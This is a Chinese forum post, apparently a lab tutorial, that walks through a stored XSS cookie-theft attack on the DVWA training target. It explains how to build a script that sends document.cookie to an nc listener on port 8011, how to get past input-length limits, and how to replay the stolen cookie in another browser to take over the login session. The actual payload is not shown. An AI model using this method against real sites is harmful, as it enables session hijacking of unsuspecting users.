XSS cookie伪造攻击

打印 上一主题 下一主题

主题 1019|帖子 1019|积分 3057

环境

系统:windows 7
靶场:DVWA
场景:chrome对firefox的个人cookie盗用伪造
IP:192.168.98.128
端口:未占用的任意端口  [1024-49151]
实施

1.首先确保firefox登录状态,即存在cookie

2.构造获取cookie的js请求脚本
  1. //因为src=“”中引号内容只会作为数据字符串进行展示,所以需引进script脚本去执行document.cookie。对标签和执行内容进行‘单引号’分隔和【数据+指令+数据】的拼接
复制代码
原理:构造一个访问请求来盗取浏览器页面的cookie
3.提交执行脚本
在任意输入框进行提交,注意绕过前端输入长度限制


4.进行nc端口监听
nc  -lp  8011
 注:此处须保持与构造请求的端口一致!!

5.替换cookie实现伪造盗用


  • 1.打开chrome浏览器访问DVWA
  • 2.找到页面cookie信息
  • 3.进行cookie值的替换
6.实现登录
此处并不是直接刷新页面,因为其登录页面是固定的,我们要通过cookie的盗用直接获取其登录状态,因此此处访问的应该是首页
http://127.0.0.1:8082

 可以看到成功进入DVWA的页面,攻击完成。
TRANSLATE with <img id="FloaterLogo"> x  English
ArabicHebrewPolish
BulgarianHindiPortuguese
CatalanHmong DawRomanian
Chinese SimplifiedHungarianRussian
Chinese TraditionalIndonesianSlovak
CzechItalianSlovenian
DanishJapaneseSpanish
DutchKlingonSwedish
EnglishKoreanThai
EstonianLatvianTurkish
FinnishLithuanianUkrainian
FrenchMalayUrdu
GermanMalteseVietnamese
GreekNorwegianWelsh
Haitian CreolePersian 
<img alt="" ><img id="HelpImg"> <img id="EmbedImg"> <img id="ShareImg">  TRANSLATE with <img id="CollapsedLogoImg"> COPY THE URL BELOW    <img id="EmailImg"> <img id="ShareHelpImg"> Back  EMBED THE SNIPPET BELOW IN YOUR SITE  <img id="EmbedHelpImg">Enable collaborative features and customize widget: Bing Webmaster PortalBack
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

欢乐狗

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表